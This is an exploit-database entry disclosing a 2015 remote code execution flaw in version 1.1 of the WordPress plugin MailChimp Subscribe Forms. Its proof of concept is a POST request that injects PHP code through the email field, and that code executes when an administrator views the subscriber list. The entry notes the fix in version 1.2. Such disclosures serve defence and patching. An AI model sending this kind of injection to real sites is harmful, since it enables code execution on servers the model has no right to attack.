WordPress Plugin MailChimp Subscribe Forms 1.1 - Remote Code Execution

2015-05-26T00:00:00
ID EXPLOITPACK:0F88EF103B7BA2CEC209F4694F2F66BD
Type exploitpack
Reporter woodspeed
Modified 2015-05-26T00:00:00

Description

WordPress Plugin MailChimp Subscribe Forms 1.1 - Remote Code Execution

                                        
                                            # Exploit Title: Wordpress MailChimp Subscribe Forms Remote Code Execution
# Date: 21-04-2015
# Exploit Author: woodspeed
# Vendor Homepage: https://wordpress.org/plugins/mailchimp-subscribe-sm/
# Software Link: https://downloads.wordpress.org/plugin/mailchimp-subscribe-sm.1.1.zip
# Version: 1.1
# Tested on: Apache 2.2.22, PHP 5.3.10
# OSVDB ID : http://www.osvdb.org/show/osvdb/121081
# WPVULNDB ID : https://wpvulndb.com/vulnerabilities/7935
# Category: webapps

1. Description

Remote Code Execution via email field.

2. Proof of Concept

POST Request

sm_email=<?php echo 'Current PHP version: '. phpversion();?>&submit=

When the admin user checks the subscibers list, the php code is executed.

3. Solution

Fixed in version 1.2